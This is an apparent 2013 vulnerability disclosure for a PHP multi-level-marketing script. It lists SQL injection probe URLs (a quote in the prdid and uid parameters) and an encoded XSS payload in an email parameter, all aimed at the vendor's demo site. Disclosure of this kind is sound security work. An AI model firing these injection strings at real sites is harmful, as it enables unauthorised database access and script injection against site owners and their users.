MLM (Multi Level Marketing) SQL Injection / XSS

Posted on 23 July 2013
##################################################################################
 _____ _ _ _ _____
 | __  | | | | (_) / ____|
 | |__) |_____ _____ | |_ _| |_ _ ___ _ __ | (___ ___ ___
 | _ // _   / / _ | | | | | __| |/ _ | '_  \___  / _ / __|
 | |   __/ V / (_) | | |_| | |_| | (_) | | | | ____) | __/ (__
 |_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| |_____/ \___|\___|

##################################################################################
MLM (Multi Level Marketing) Script, Multiple Vulnerabilities
Product Page: http://www.mlmscript.in/
Script Demo: http://www.mlmscript.in/product/version2

Author(Pentester): 3spi0n
On Web: RevolutionSec.Com - GraySecure.Org
On Social: Twitter.Com/eyyamgudeer
##################################################################################

[1] SQL Injection Vulnerabilities on Demo Site

[+] (productview.php, prdid Param)
>>> http://www.mlmscript.in/product/version2/productview.php?prdid='1

[+] (productview.php, uid param)
>>> http://www.mlmscript.in/product/version2/profileview.php?uid='1

[2] Xss (Cross Site Scripting) Vulnerability on Demo Site

[+] (regcheck_email.php, email param)
>>> http://www.mlmscript.in/product/version2/regcheck_email.php?email=%3Cvideo%3E%3Csource%20onerror%3d%22javascript%3aprompt%28912327%29%22%3E
TOP
Malware :

None in database
Last 20
Exploits :

Last 20